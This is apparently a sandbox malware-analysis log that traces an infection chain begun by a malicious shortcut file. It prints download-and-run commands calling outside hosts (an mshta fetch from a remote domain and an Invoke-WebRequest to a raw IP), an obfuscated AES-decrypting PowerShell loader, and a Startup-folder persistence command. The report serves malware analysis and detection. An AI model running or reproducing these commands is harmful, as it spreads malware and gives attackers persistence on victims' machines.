Source: R8CAg00Db8.lnkLNK file: /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EC110: CreateFileW,DeviceIoControl,CloseHandle,10_2_00007FF79F8EC110
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DD2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,10_2_00007FF79F8DD2C4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8ED750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00007FF79F8ED750
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F15778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,20_2_00F15778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A25778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,24_2_00A25778
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 009D1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 009E8B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 009E0D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00ED0D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00EC1A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00ED8B30 appears 42 times
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: String function: 00007FF79F898D58 appears 76 times
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3021
Source: Process Memory Space: powershell.exe PID: 1260, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winLNK@40/75@5/3
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F3778 GetLastError,FormatMessageW,10_2_00007FF79F8F3778
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DD5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00007FF79F8DD5CC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DCCE0 AdjustTokenPrivileges,CloseHandle,10_2_00007FF79F8DCCE0
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F08DE9 AdjustTokenPrivileges,CloseHandle,20_2_00F08DE9
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F09399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,20_2_00F09399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A18DE9 AdjustTokenPrivileges,CloseHandle,24_2_00A18DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A19399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,24_2_00A19399
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,10_2_00007FF79F8F59D8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EBE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00007FF79F8EBE00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F5F2C CoInitialize,CoCreateInstance,CoUninitialize,10_2_00007FF79F8F5F2C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F876580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00007FF79F876580
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csjszw4o.lc5.ps1
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\forfiles.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: R8CAg00Db8.lnkReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean[...]oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1684,i,8099529981057222917,3572816472393853467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: R8CAg00Db8.lnk LNK file: ..\..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe
Source: Binary string: dvdplay.pdb source: mshta.exe

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean[...]oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F907634 LoadLibraryA,GetProcAddress,10_2_00007FF79F907634
Source: ghep1[1].3.dr Static PE information: real checksum: 0x5f0d should be: 0x2286a
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9AA81621 pushad ; ret 5_2_00007FFD9AA81629
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F8A78FD push rdi; ret 10_2_00007FF79F8A7904
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F8A7399 push rdi; ret 10_2_00007FF79F8A73A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFD9A9B0B9A push eax; retf 18_2_00007FFD9A9B0D4D
Source: C:\Users\Public\Guard.exe Code function: 20_2_00EDE93F push edi; ret 20_2_00EDE941
Source: C:\Users\Public\Guard.exe Code function: 20_2_00EDEA58 push esi; ret 20_2_00EDEA5A
Source: C:\Users\Public\Guard.exe Code function: 20_2_00F18A4A push FFFFFF8Bh; iretd 20_2_00F18A4C
Source: C:\Users\Public\Guard.exe Code function: 20_2_00ED8B75 push ecx; ret 20_2_00ED8B88
Source: C:\Users\Public\Guard.exe Code function: 20_2_00EDEC33 push esi; ret 20_2_00EDEC35
Source: C:\Users\Public\Guard.exe Code function: 20_2_00EDED1C push edi; ret 20_2_00EDED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_009EE93F push edi; ret 24_2_009EE941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_009EEA58 push esi; ret 24_2_009EEA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_00A28A4A push FFFFFF8Bh; iretd 24_2_00A28A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_009E8B75 push ecx; ret 24_2_009E8B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_009EEC33 push esi; ret 24_2_009EEC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_009EED1C push edi; ret 24_2_009EED1E

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\Public\Guard.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F894514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00007FF79F894514
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,20_2_00F359B3
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EC5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_00EC5EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A459B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,24_2_00A459B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009D5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,24_2_009D5EDA
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_00ED33B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
